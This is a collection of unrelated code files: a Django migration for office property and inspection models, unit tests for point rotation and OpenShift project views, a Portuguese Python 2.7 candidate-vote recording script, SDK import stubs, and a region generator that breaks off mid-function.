('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('expiry_date', models.DateField(null=True, blank=True)),
('renewal_date', models.DateField(null=True, blank=True)),
('rental_amount', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('new_expiry_date', models.DateField(null=True, blank=True)),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_leaseagreement_renewals', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_leaseagreementrenewals', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_leaseagreementrenewals', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='OfficeInspection',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date_checked', models.DateField(null=True, blank=True)),
('time_checked', models.TimeField(null=True, blank=True)),
('walls_and_covering', models.BooleanField(default=False)),
('windows_and_handles', models.BooleanField(default=False)),
('blinds', models.BooleanField(default=False)),
('ceiling', models.BooleanField(default=False)),
('lights_and_switches', models.BooleanField(default=False)),
('doors_and_handles', models.BooleanField(default=False)),
('air_conditioner', models.BooleanField(default=False)),
('furniture', models.BooleanField(default=False)),
('fire_extinguisher', models.BooleanField(default=False)),
('white_board', models.BooleanField(default=False)),
('overhead_projector', models.BooleanField(default=False)),
('appliances', models.BooleanField(default=False)),
('shelving', models.BooleanField(default=False)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_propfac_inspections', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_officeinspections', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('floor', models.ForeignKey(related_name='floor_propfac_inspections', to='offices.Floor')),
('inspector', models.ForeignKey(related_name='inspector_propfac_inspections', to='employees.Employee')),
('modified_by', models.ForeignKey(related_name='user_modified_officeinspections', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('section', models.ForeignKey(related_name='section_propfac_inspections', to='offices.Section')),
],
),
migrations.CreateModel(
name='PFComment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('comments', models.CharField(default=None, max_length=2000)),
('commented', models.DateTimeField(auto_now_add=True)),
('comment_type', models.CharField(default=None, max_length=120, null=True, blank=True)),
('obj_id', models.IntegerField(null=True, blank=True)),
('branch', models.ForeignKey(related_name='branch_propfac_comments', blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='user_propfac_comments', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='PFDocument',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('file_name', models.CharField(max_length=255, blank=True)),
('file', models.FileField(upload_to=b'uploads/property')),
('obj_id', models.CharField(default=None, max_length=20, null=True, blank=True)),
('obj_type', models.CharField(default=None, max_length=50, null=True, blank=True)),
('date_uploaded', models.DateTimeField(auto_now_add=True)),
('branch', models.ForeignKey(related_name='branch_propfac_documents', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_pfdocuments', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='PFRequisition',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('quote_number', models.CharField(default=None, max_length=120)),
('obj_id', models.IntegerField(null=True, blank=True)),
('requisition_type', models.CharField(default=None, max_length=120)),
('description', models.CharField(default=None, max_length=2000, null=True, blank=True)),
('requested', models.DateTimeField(auto_now_add=True)),
('supplier', models.CharField(default=None, max_length=120)),
('vat_included', models.BooleanField(default=True)),
('branch', models.ForeignKey(related_name='branches_propfac_requisitions', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_pfrequisitions', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_pfrequisitions', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('requested_by', models.ForeignKey(related_name='employee_propfac_requisitions', to='employees.Employee')),
],
),
migrations.CreateModel(
name='PFRequisitionItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('item_code', models.CharField(default=None, max_length=200, null=True, blank=True)),
('line_item', models.CharField(default=None, max_length=200, null=True, blank=True)),
('qty', models.IntegerField(null=True, blank=True)),
('unit_price', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('line_total', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('created_by', models.ForeignKey(related_name='user_pfrequisitionitems', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_pfrequisitionitems', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('requisition_no', models.ForeignKey(related_name='requisition_requistionItems', to='propfac.PFRequisition')),
],
),
migrations.CreateModel(
name='PropertyMaintenance',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('maint_date', models.DateField(null=True, blank=True)),
('maintenance_type', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'General', b'General'), (b'Air Conditioning', b'Air Conditioning'), (b'Electrical', b'Electrical'), (b'Floor Capets and Tiling', b'Floor Carpets and Tiling'), (b'Plumbing', b'Plumbing'), (b'Security', b'Security'), (b'Walls And Partitioning', b'Walls And Partitioning')])),
('description', models.CharField(default=None, max_length=2000, null=True, blank=True)),
('projected_cost', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('actual_cost', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('difference', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('invoice_number', models.CharField(default=None, max_length=200, null=True, blank=True)),
('service_provider', models.CharField(default=None, max_length=200, null=True, blank=True)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages'), (b'Write Off', b'Write Off')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_building_maintenance', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_propertymaintenance', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='user_modified_propertymaintenance', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.CreateModel(
name='ToiletInspection',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('toilet', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'gents', b'Gents'), (b'ladies', b'Ladies')])),
('date_checked', models.DateField(null=True, blank=True)),
('time_checked', models.TimeField(null=True, blank=True)),
('walls_and_covering', models.BooleanField(default=False)),
('windows_and_handles', models.BooleanField(default=False)),
('ceiling', models.BooleanField(default=False)),
('lights_and_switches', models.BooleanField(default=False)),
('doors_and_hanles', models.BooleanField(default=False)),
('air_extractor', models.BooleanField(default=False)),
('seat_and_cover', models.BooleanField(default=False)),
('urinary', models.BooleanField(default=False)),
('water_dispenser', models.BooleanField(default=False)),
('washing_basin', models.BooleanField(default=False)),
('taps', models.BooleanField(default=False)),
('towel_dispencer', models.BooleanField(default=False)),
('detegent_dispencer', models.BooleanField(default=False)),
('mirror', models.BooleanField(default=False)),
('furniture', models.BooleanField(default=False)),
('fire_extinguisher', models.BooleanField(default=False)),
('shelving', models.BooleanField(default=False)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('branch', models.ForeignKey(related_name='branch_propfac_toilet_inspection', to='offices.Branch')),
('created_by', models.ForeignKey(related_name='user_toiletinspections', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('floor', models.ForeignKey(related_name='floor_propfac_toilet_inspection', to='offices.Floor')),
('inspector', models.ForeignKey(related_name='inspector_propfac_toilet_inspection', to='employees.Employee')),
('modified_by', models.ForeignKey(related_name='user_modified_toiletinspections', blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
),
migrations.AddField(
model_name='historicalpfrequisitionitem',
name='requisition_no',
field=models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='propfac.PFRequisition', null=True),
),
]
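Each historical model above sets `ordering = ('-history_date', '-history_id')` and `get_latest_by = 'history_date'`, the django-simple-history convention: the most recent change comes first, and same-timestamp ties break on the auto-incrementing `history_id`. A minimal plain-Python sketch of that tie-breaking (illustrative only, no Django involved; the sample records are made up):

```python
# Illustrative sketch of the ('-history_date', '-history_id') ordering used by
# the historical models above. ISO-8601 timestamp strings compare correctly as
# plain text, so tuple comparison mirrors the database ordering.
records = [
    {"history_id": 1, "history_date": "2021-01-01T09:00:00", "history_type": "+"},
    {"history_id": 2, "history_date": "2021-01-02T09:00:00", "history_type": "~"},
    {"history_id": 3, "history_date": "2021-01-02T09:00:00", "history_type": "~"},
]

# "Latest" record: highest history_date, with ties broken by the larger
# (i.e. more recently assigned) history_id.
latest = max(records, key=lambda r: (r["history_date"], r["history_id"]))
```

Records 2 and 3 share a timestamp here, so the tie-break on `history_id` selects record 3.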
# Source: tests/test_math_utils.py (repo: andrewlavaia/Traffic-Simulator, license: MIT)
import unittest
import math
import math_utils


class TestRotateAroundPoint(unittest.TestCase):
    def test_90_degree_rotation(self):
        point = (1, 0)
        degrees = 90
        expected = (0, 1)
        result = math_utils.rotate_point(point, degrees)
        self.assertAlmostEqual(expected[0], result[0], places=10)
        self.assertAlmostEqual(expected[1], result[1], places=10)

    def test_45_degree_rotation(self):
        point = (1, 0)
        degrees = 45
        expected = (math.sqrt(2)/2, math.sqrt(2)/2)
        result = math_utils.rotate_point(point, degrees)
        self.assertAlmostEqual(expected[0], result[0], places=10)
        self.assertAlmostEqual(expected[1], result[1], places=10)

    def test_0_degree_rotation(self):
        point = (1, 0)
        degrees = 0
        expected = (1, 0)
        result = math_utils.rotate_point(point, degrees)
        self.assertAlmostEqual(expected[0], result[0], places=10)
        self.assertAlmostEqual(expected[1], result[1], places=10)

    def test_360_degree_rotation(self):
        point = (1, 0)
        degrees = 1080  # three full turns; any multiple of 360 is an identity rotation
        expected = (1, 0)
        result = math_utils.rotate_point(point, degrees)
        self.assertAlmostEqual(expected[0], result[0], places=10)
        self.assertAlmostEqual(expected[1], result[1], places=10)

    def test_90_degree_rotation_around_point(self):
        point = (5, 3)
        center_point = (3, 3)
        degrees = 90
        expected = (3, 5)
        result = math_utils.rotate_point(point, degrees, center_point)
        self.assertAlmostEqual(expected[0], result[0], places=10)
        self.assertAlmostEqual(expected[1], result[1], places=10)

    def test_45_degree_rotation_around_point(self):
        point = (5, 3)
        center_point = (3, 3)
        degrees = 45
        expected = (3 + math.sqrt(2), 3 + math.sqrt(2))
        result = math_utils.rotate_point(point, degrees, center_point)
        self.assertAlmostEqual(expected[0], result[0], places=10)
        self.assertAlmostEqual(expected[1], result[1], places=10)

    def test_0_degree_rotation_around_point(self):
        point = (5, 3)
        center_point = (3, 3)
        degrees = 0
        expected = (5, 3)
        result = math_utils.rotate_point(point, degrees, center_point)
        self.assertAlmostEqual(expected[0], result[0], places=10)
        self.assertAlmostEqual(expected[1], result[1], places=10)


if __name__ == "__main__":
    unittest.main()
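The `math_utils.rotate_point` function under test is not shown in this file. A minimal implementation consistent with the assertions above (counterclockwise rotation by degrees around an optional center point, defaulting to the origin) might look like the following. This is an assumed sketch, not the actual `math_utils` module:

```python
import math


def rotate_point(point, degrees, center_point=(0, 0)):
    """Rotate `point` counterclockwise by `degrees` around `center_point`.

    Assumed sketch: the real math_utils module is not shown in this repo chunk.
    """
    radians = math.radians(degrees)
    # Translate so the center is at the origin, rotate, translate back.
    x = point[0] - center_point[0]
    y = point[1] - center_point[1]
    return (
        center_point[0] + x * math.cos(radians) - y * math.sin(radians),
        center_point[1] + x * math.sin(radians) + y * math.cos(radians),
    )
```

With this definition, `rotate_point((1, 0), 90)` lands (within floating-point error) on `(0, 1)`, matching the first test case.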
# Source: koku/api/resource_types/test/openshift_projects/test_views.py (repo: rubik-ai/koku, license: Apache-2.0)
#
# Copyright 2021 Red Hat Inc.
# SPDX-License-Identifier: Apache-2.0
#
"""Test the Resource Types views."""
from django.db.models import F
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APIClient
from tenant_schemas.utils import schema_context

from api.iam.test.iam_test_case import IamTestCase
from api.iam.test.iam_test_case import RbacPermissions
from reporting.provider.ocp.models import OCPCostSummaryByProjectP


class ResourceTypesViewTestOpenshiftProjects(IamTestCase):
    """Tests the resource types views."""

    def setUp(self):
        """Set up the customer view tests."""
        super().setUp()
        self.client = APIClient()

    @RbacPermissions({"openshift.project": {"read": ["cost-management"]}})
    def test_openshift_project_with_project_access_view(self):
        """Test endpoint runs with a customer owner."""
        with schema_context(self.schema_name):
            expected = (
                OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
                .values("value")
                .distinct()
                .filter(namespace__in=["cost-management"])
                .count()
            )
            # check that the expected is not zero
            self.assertTrue(expected)
        url = reverse("openshift-projects")
        response = self.client.get(url, **self.headers)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        json_result = response.json()
        self.assertIsNotNone(json_result.get("data"))
        self.assertIsInstance(json_result.get("data"), list)
        self.assertEqual(len(json_result.get("data")), expected)

    @RbacPermissions({"openshift.cluster": {"read": ["OCP-on-AWS"]}})
    def test_openshift_project_with_cluster_access_view(self):
        """Test endpoint runs with a customer owner."""
        with schema_context(self.schema_name):
            expected = (
                OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
                .values("value")
                .distinct()
                .filter(cluster_id__in=["OCP-on-AWS"])
                .count()
            )
            # check that the expected is not zero
            self.assertTrue(expected)
        url = reverse("openshift-projects")
        response = self.client.get(url, **self.headers)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        json_result = response.json()
        self.assertIsNotNone(json_result.get("data"))
        self.assertIsInstance(json_result.get("data"), list)
        self.assertEqual(len(json_result.get("data")), expected)

    @RbacPermissions(
        {"openshift.cluster": {"read": ["OCP-on-AWS"]}, "openshift.project": {"read": ["cost-management"]}}
    )
    def test_openshift_project_with_cluster_and_project_access_view(self):
        """Test endpoint runs with a customer owner."""
        with schema_context(self.schema_name):
            expected = (
                OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
                .values("value")
                .distinct()
                .filter(namespace__in=["cost-management"], cluster_id__in=["OCP-on-AWS"])
                .count()
            )
            # check that the expected is not zero
            self.assertTrue(expected)
        url = reverse("openshift-projects")
        response = self.client.get(url, **self.headers)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        json_result = response.json()
        self.assertIsNotNone(json_result.get("data"))
        self.assertIsInstance(json_result.get("data"), list)
        self.assertEqual(len(json_result.get("data")), expected)

    @RbacPermissions({"openshift.cluster": {"read": ["OCP-on-AWS"]}, "openshift.project": {"read": ["*"]}})
    def test_openshift_project_with_cluster_and_all_project_access_view(self):
        """Test endpoint runs with a customer owner."""
        with schema_context(self.schema_name):
            expected = (
                OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
                .values("value")
                .distinct()
                .filter(cluster_id__in=["OCP-on-AWS"])
                .count()
            )
            # check that the expected is not zero
            self.assertTrue(expected)
        url = reverse("openshift-projects")
        response = self.client.get(url, **self.headers)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        json_result = response.json()
        self.assertIsNotNone(json_result.get("data"))
        self.assertIsInstance(json_result.get("data"), list)
        self.assertEqual(len(json_result.get("data")), expected)

    @RbacPermissions({"openshift.cluster": {"read": ["*"]}, "openshift.project": {"read": ["cost-management"]}})
    def test_openshift_project_with_all_cluster_and_project_access_view(self):
        """Test endpoint runs with a customer owner."""
        with schema_context(self.schema_name):
            expected = (
                OCPCostSummaryByProjectP.objects.annotate(**{"value": F("namespace")})
                .values("value")
                .distinct()
                .filter(namespace__in=["cost-management"])
                .count()
            )
            # check that the expected is not zero
            self.assertTrue(expected)
        url = reverse("openshift-projects")
        response = self.client.get(url, **self.headers)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        json_result = response.json()
        self.assertIsNotNone(json_result.get("data"))
        self.assertIsInstance(json_result.get("data"), list)
        self.assertEqual(len(json_result.get("data")), expected)
lista_de_candidatos.py (repo: rennancrf/PythonScripts, license: MIT)

##################################################################
#####              UNIVERSIDADE ESTACIO DE SA                #####
##### GRADUATE PROGRAM IN DATA SCIENCE & BIG DATA ANALYTICS  #####
#####             Python 2.7 Course Assignment               #####
#####           Rennan Goncalves Sanches Correa              #####
#####           Python 2.7 Language (NPG2064)                #####
#####           Tutor: Prof. Andre Luiz Braga                #####
##################################################################
##################################################################
#####      BEFORE RUNNING THIS FILE, THE DIRECTORY           #####
#####      "Trab_Rennan" MUST ALREADY EXIST IN C:\           #####
##################################################################
import pickle
########################################################################################################################
# Function that runs the query menu over a previously recorded data file.
def consultas():
    base = raw_input('\nDigite o nome do arquivo para consulta:\n')
    try:
        v_arquivo = open("C:/Trab_Rennan/" + base + ".dat", "rb")
    except IOError:
        print("Erro ao abrir arquivo " + base + ".dat\n")
        raw_input("Pressione <Enter> para sair...")
        exit()
    opcao_cons = raw_input("\nSelecione o Tipo de consulta:\n"
                           "1-Listar Candidatos\n"
                           "2-Listar Votos por Candidatos\n"
                           "3-Listar Total de Votos por Cargo e Região\n"
                           "4-Listar Total de Votos por Região e Candidato\n"
                           "5-Sair\n")
    # Determine the file size, then read the pickled fields back until
    # the read position reaches the end of the file.
    v_arquivo.seek(0, 2)
    tamanho = v_arquivo.tell()
    v_arquivo.seek(0)
    cod_candidato = []
    nome = []
    cargo = []
    regiao = []
    num_votos = []
    while v_arquivo.tell() < tamanho:
        cod_candidato.append(pickle.load(v_arquivo))
        nome.append(pickle.load(v_arquivo))
        cargo.append(pickle.load(v_arquivo))
        regiao.append(pickle.load(v_arquivo))
        num_votos.append(pickle.load(v_arquivo))
    v_arquivo.close()
    # Lookup table mapping a region code to its state name (replaces the
    # four identical 27-branch elif ladders of the original version).
    estados = {
        1: '01- Acre - AC', 2: '02- Alagoas - AL', 3: '03- Amapá - AP',
        4: '04- Amazonas - AM', 5: '05- Bahia - BA', 6: '06- Ceará - CE',
        7: '07- Distrito Federal - DF', 8: '08- Espírito Santo - ES',
        9: '09- Goiás - GO', 10: '10- Maranhão - MA', 11: '11- Mato Grosso - MT',
        12: '12- Mato Grosso do Sul - MS', 13: '13- Minas Gerais - MG',
        14: '14- Pará - PA', 15: '15- Paraíba - PB', 16: '16- Paraná - PR',
        17: '17- Pernambuco - PE', 18: '18- Piauí - PI', 19: '19- Roraima - RR',
        20: '20- Rondônia - RO', 21: '21- Rio de Janeiro - RJ',
        22: '22- Rio Grande do Norte - RN', 23: '23- Rio Grande do Sul - RS',
        24: '24- Santa Catarina - SC', 25: '25- São Paulo - SP',
        26: '26- Sergipe - SE', 27: '27- Tocantins - TO',
    }

    # Navigation submenu shown after every query.
    def submenu():
        opcao = raw_input('\nDigite uma das opções abaixo para continuar:\n'
                          '1- Voltar para consulta\n'
                          '2- Voltar para menu inicial\n'
                          '3- Sair do programa\n')
        if int(opcao) == 1:
            return consultas()
        elif int(opcao) == 2:
            return menu_inicial()
        else:
            exit()

    #################################################################
    if opcao_cons == '1':
        print '\nRelação de candidatos\n'
        texto = '|COD_CANDIDATO |'
        texto = texto + str('NOME').ljust(30, ' ')
        texto = texto + str('|CARGO').ljust(22, ' ')
        texto = texto + str('|REGIÃO').ljust(37, ' ')
        print texto
        for i in range(len(cod_candidato)):
            estado = estados[int(regiao[i])]
            print str(cod_candidato[i].ljust(15, ' ')) + '|' + str(nome[i].ljust(30, ' ')) + '|' + str(cargo[i].ljust(20, ' ')) + ' |' + str(estado.ljust(35, ' '))
        return submenu()
    #################################################################
    elif opcao_cons == '2':
        print '\nRelação de votos por Candidato\n'
        texto = '|COD_CANDIDATO |'
        texto = texto + str('NOME').ljust(30, ' ')
        texto = texto + str('|CARGO').ljust(22, ' ')
        texto = texto + str('|NUM_VOTOS|')
        texto = texto + str('REGIÃO').ljust(37, ' ')
        print texto
        for i in range(len(cod_candidato)):
            estado = estados[int(regiao[i])]
            print str(cod_candidato[i].ljust(15, ' ')) + '|' + str(nome[i].ljust(30, ' ')) + '|' + str(cargo[i].ljust(20, ' ')) + ' |' + str(num_votos[i].ljust(9, ' ')) + '|' + str(estado).ljust(35, ' ') + '|'
        return submenu()
    #################################################################
    elif opcao_cons == '3':
        print '\nRelação de votos por Cargo e Região\n'
        texto = ' -- |COD_CANDIDATO|' + 'NOME'.ljust(25, ' ') + '|NUM_VOTOS|'
        # Collect the distinct cargos and regions, preserving input order.
        agrupa_cargo = []
        for c in cargo:
            if c not in agrupa_cargo:
                agrupa_cargo.append(c)
        agrupa_regiao = []
        for r in regiao:
            if r not in agrupa_regiao:
                agrupa_regiao.append(r)
        for k in range(len(agrupa_cargo)):
            ver_reg = []
            print '-'.ljust(60, '-')
            print '\nCARGO - ' + str(agrupa_cargo[k]).ljust(10, ' ')
            for l in range(len(agrupa_regiao)):
                for m in range(len(nome)):
                    if cargo[m] == agrupa_cargo[k] and regiao[m] == agrupa_regiao[l]:
                        # Print the region header the first time this region
                        # appears under the current cargo.
                        if regiao[m] not in ver_reg:
                            print '\n- REGIAO - ' + estados[int(agrupa_regiao[l])]
                            print texto
                        print ' -- |' + str(cod_candidato[m]).ljust(13, ' ') + '|' + str(nome[m]).ljust(25, ' ') + '|' + str(num_votos[m]).ljust(9, ' ') + '|'
                        ver_reg.append(regiao[m])
        return submenu()
    #################################################################
    elif opcao_cons == '4':
        print '\nRelação de votos por Região\n'
        texto = ' -- |COD_CANDIDATO|' + 'NOME'.ljust(25, ' ') + '|' + 'CARGO'.ljust(25, ' ') + '|NUM_VOTOS|'
        # Accumulate the total number of votes per region.
        agrupa_regiao = []
        regiao_votos = []
        for j in range(len(regiao)):
            if regiao[j] not in agrupa_regiao:
                regiao_votos.append(int(num_votos[j]))
                agrupa_regiao.append(str(regiao[j]))
            else:
                index = agrupa_regiao.index(str(regiao[j]))
                regiao_votos[index] = int(num_votos[j]) + int(regiao_votos[index])
        for l in range(len(agrupa_regiao)):
            ver_reg = []
            for m in range(len(nome)):
                if regiao[m] == agrupa_regiao[l]:
                    # Print the region header (with its vote total) once.
                    if regiao[m] not in ver_reg:
                        print '-'.ljust(80, '-')
                        print '\n- REGIAO - ' + estados[int(agrupa_regiao[l])] + ' - TOTAL DE VOTOS - ' + str(regiao_votos[l])
                        print texto
                    print ' -- |' + str(cod_candidato[m]).ljust(13, ' ') + '|' + str(nome[m]).ljust(25, ' ') + '|' + str(cargo[m]).ljust(25, ' ') + '|' + str(num_votos[m]).ljust(9, ' ') + '|'
                    ver_reg.append(regiao[m])
        return submenu()
    #################################################################
    elif opcao_cons == '5':
        # The menu option is read as a string, so compare against '5'
        # (the original compared against the integer 5 and never matched).
        exit()
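Option 4 above totals votes per region with parallel lists and `index()` lookups. For illustration only, the same aggregation can be sketched with a dictionary; the region codes and vote counts below are hypothetical sample values, not data from the program's files:

```python
def total_votes_by_region(regioes, votos):
    # Accumulate vote counts keyed by region code (codes arrive as strings,
    # exactly as raw_input returns them in the program above).
    totais = {}
    for regiao, n in zip(regioes, votos):
        totais[regiao] = totais.get(regiao, 0) + int(n)
    return totais

# Hypothetical sample data.
print(total_votes_by_region(['25', '25', '21'], ['100', '50', '30']))  # {'25': 150, '21': 30}
```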
########################################################################################################################
# Function that records candidate data in the binary file.
def cadastrar_dados():
    nom_arq = raw_input("Digite o nome do arquivo:\n")
    try:
        arquivo = open("C:/Trab_Rennan/" + nom_arq + ".dat", "ab")
    except IOError:
        print("Erro ao abrir arquivo " + nom_arq + ".dat\n")
        raw_input("Pressione <Enter> para sair...")
        exit()
    cargos = {'1': 'Governador', '2': 'Prefeito', '3': 'Deputado Estadual', '4': 'Vereador'}
    controle = 1
    while controle > 0:
        cod_candidato = raw_input("\nDigite o código do candidato:")
        nome = raw_input("\nDigite o nome do candidato:")
        print '\nSelecione o cargo do candidato:\n1-Governador\n2-Prefeito\n3-Deputado Estadual\n4-Vereador'
        cargo = raw_input("\nCargo:")
        # Re-prompt on an invalid option (the original left cod_cargo
        # undefined and crashed when the input was not 1-4).
        while cargo not in cargos:
            cargo = raw_input("\nCargo inválido. Digite 1, 2, 3 ou 4:")
        cod_cargo = cargos[cargo]
        print 'Código de Região:\n'
        print ('01- Acre - AC             10- Maranhão - MA           19- Roraima - RR\n'
               '02- Alagoas - AL          11- Mato Grosso - MT        20- Rondônia - RO\n'
               '03- Amapá - AP            12- Mato Grosso do Sul - MS 21- Rio de Janeiro - RJ\n'
               '04- Amazonas - AM         13- Minas Gerais - MG       22- Rio Grande do Norte - RN\n'
               '05- Bahia - BA            14- Pará - PA               23- Rio Grande do Sul - RS\n'
               '06- Ceará - CE            15- Paraíba - PB            24- Santa Catarina - SC\n'
               '07- Distrito Federal - DF 16- Paraná - PR             25- São Paulo - SP\n'
               '08- Espírito Santo - ES   17- Pernambuco - PE         26- Sergipe - SE\n'
               '09- Goiás - GO            18- Piauí - PI              27- Tocantins - TO\n')
        regiao = raw_input("\nDigite o código da região do candidato:")
        num_votos = raw_input("\nDigite a quantidade de votos do candidato:")
        conf_dados = raw_input("Confirma dados? (S/N)\n")
        if conf_dados.upper() == "S":
            # One pickle.dump per field; consultas() reads them back in this order.
            pickle.dump(cod_candidato, arquivo)
            pickle.dump(nome.upper(), arquivo)
            pickle.dump(cod_cargo.upper(), arquivo)
            pickle.dump(regiao, arquivo)
            pickle.dump(num_votos, arquivo)
            print "Dados gravados com sucesso!\n"
        conf_dados = raw_input("Cadastrar novos dados? (S/N)\n")
        if conf_dados.upper() != "S":
            arquivo.close()
            controle = controle - 1
    return menu_inicial()
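`cadastrar_dados` writes each field with its own `pickle.dump`, and `consultas` reads fields back with repeated `pickle.load` calls until the file position reaches the file size. That round trip can be sketched in isolation against an in-memory buffer (the sample record below is made up):

```python
import io
import pickle

buf = io.BytesIO()
record = ('123', 'FULANO DE TAL', 'VEREADOR', '25', '1000')
for field in record:
    pickle.dump(field, buf)   # one dump per field, as cadastrar_dados does

buf.seek(0, 2)                # jump to the end to learn the total size
tamanho = buf.tell()
buf.seek(0)
fields = []
while buf.tell() < tamanho:   # read back until the position reaches the size
    fields.append(pickle.load(buf))
print(fields == list(record))  # True
```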
########################################################################################################
# Initial options menu.
def menu_inicial():
    menu_principal = raw_input("\nSelecione uma das opções abaixo:\n"
                               "1- Cadastrar dados de candidatos\n"
                               "2- Consultar dados de candidatos\n"
                               "3- Sair do programa\n")
    if int(menu_principal) == 1:
        return cadastrar_dados()
    elif int(menu_principal) == 2:
        return consultas()
    else:
        exit()
########################################################################################################
####------ PROGRAM ENTRY POINT -------####
menu_inicial()
bitmovin_api_sdk/notifications/emails/usage_reports/__init__.py (repo: jaythecaesarean/bitmovin-api-sdk-python, license: MIT)

from bitmovin_api_sdk.notifications.emails.usage_reports.usage_reports_api import UsageReportsApi
from bitmovin_api_sdk.notifications.emails.usage_reports.email_notification_list_query_params import EmailNotificationListQueryParams
stable_baselines3/pdqn/__init__.py (repo: martinwimpff/stable-baselines3-hmlf, license: MIT)

from stable_baselines3.pdqn.pdqn import PDQN
from stable_baselines3.pdqn.policies import CnnPolicy, MlpPolicy
CS 495 - Spatiotemporal Databases (IS)/raincloudcollector/region.py (repo: kevin-411/SIUE-Projects, license: MIT)

import segLibrary
import hsegLibrary
import struct
def getRandomIntegerRegion( numRandomSegsToGenerate = 50, percentOfSegsToRemove = .05 ):
    '''
    Generates a region from random segments with integer endpoints.

    input:
        numRandomSegsToGenerate: the number of random segs to generate.  The actual region
            will have many fewer segs than this.  Higher numbers will typically generate more
            complex regions.  The region is constructed by intersecting the random segs and
            finding a region among the resulting segs.
        percentOfSegsToRemove: once the random segments are generated and intersected such
            that all segments intersect only at endpoints, some segments are removed at
            random.  This parameter is the fraction of the overall segs that will be removed.
            A higher number typically causes regions to have less regular shapes.  Note that
            a high percentage may require a larger number of random segs to be generated.
    returns:
        hsegs: an ordered list of half segments with valid labels.
            A half segment is a tuple of the form ((x,y),(x,y), labelAbove, labelBelow).
            Labels are integral values: an interior label is positive, an exterior label
            is -1.  hsegs is ordered in half segment order, and each cycle in hsegs has
            its own unique label number.
    '''
    if numRandomSegsToGenerate == None:
        numRandomSegsToGenerate = 50
    if percentOfSegsToRemove == None:
        percentOfSegsToRemove = .05
    # generate a bunch of random segs with integer endpoints
    segs = segLibrary.createRandomSegs( numRandomSegsToGenerate )
    # find their intersections, but make sure the endpoints stay integers
    segs = segLibrary.calcNonIntersectingSegsIntEndPoints( segs )
    # randomly remove some of the segs
    segs = segLibrary.removeRandSegs( segs, percentOfSegsToRemove )
    # create a region, favoring cycles that contain many segments
